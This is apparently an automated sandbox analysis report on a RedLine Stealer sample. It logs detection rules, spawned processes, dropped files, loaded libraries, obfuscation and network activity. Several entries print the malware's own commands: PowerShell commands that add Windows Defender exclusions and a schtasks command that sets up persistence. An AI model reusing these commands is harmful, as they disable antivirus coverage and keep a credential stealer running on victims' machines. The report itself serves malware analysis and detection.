                    Source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: tfF3UBTdr8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: WltfeVzR.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, Lb5H43iY6A7OV1von7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/103@1/1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile created: C:\Users\user\AppData\Roaming\WltfeVzR.exe
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMutant created: \Sessions\1\BaseNamedObjects\xltcLKgmXVmRruxsLQFTtnWtWg
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8652.tmp
                    Source: tfF3UBTdr8.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: tmp8CCB.tmp.16.dr, tmpC583.tmp.16.dr, tmpD7FD.tmp.9.dr, tmp7E54.tmp.9.dr, tmp366F.tmp.16.dr, tmpD83E.tmp.9.dr, tmp366E.tmp.16.dr, tmp6D9E.tmp.16.dr, tmp365C.tmp.16.dr, tmp8CDC.tmp.16.dr, tmp7E65.tmp.9.dr, tmp8CEE.tmp.16.dr, tmp8CED.tmp.16.dr, tmp365D.tmp.16.dr, tmp7E64.tmp.9.dr, tmpB48A.tmp.9.dr, tmp6D9D.tmp.16.dr, tmpD80E.tmp.9.dr, tmp7E42.tmp.9.dr, tmpD870.tmp.9.dr, tmpD86F.tmp.9.dr, tmpC584.tmp.16.dr, tmp7E53.tmp.9.dr, tmpD84E.tmp.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: tfF3UBTdr8.exeReversingLabs: Detection: 68%
                    Source: tfF3UBTdr8.exeVirustotal: Detection: 45%
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile read: C:\Users\user\Desktop\tfF3UBTdr8.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\tfF3UBTdr8.exe "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Users\user\Desktop\tfF3UBTdr8.exe "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\WltfeVzR.exe C:\Users\user\AppData\Roaming\WltfeVzR.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Users\user\AppData\Roaming\WltfeVzR.exe "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: tfF3UBTdr8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: tfF3UBTdr8.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: tfF3UBTdr8.exe, 00000009.00000002.2206038286.0000000001595000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: tfF3UBTdr8.exe, Fcontainer.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: WltfeVzR.exe.0.dr, Fcontainer.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.tfF3UBTdr8.exe.5c50000.3.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.tfF3UBTdr8.exe.4131fd8.0.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.cs | .Net Code: A5gOrm5nqsWvGsyckyl System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe | Code function: 9_2_06AD1810 push es; ret 9_2_06AD1820
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe | Code function: 16_2_0655E5C0 push es; ret 16_2_0655E5D0
                    Source: tfF3UBTdr8.exe | Static PE information: section name: .text entropy: 7.71081119448831
                    Source: WltfeVzR.exe.0.dr | Static PE information: section name: .text entropy: 7.71081119448831
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe | File created: C:\Users\user\AppData\Roaming\WltfeVzR.exe (dropped file)

                    Boot Survival

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49723
                    Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49724
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
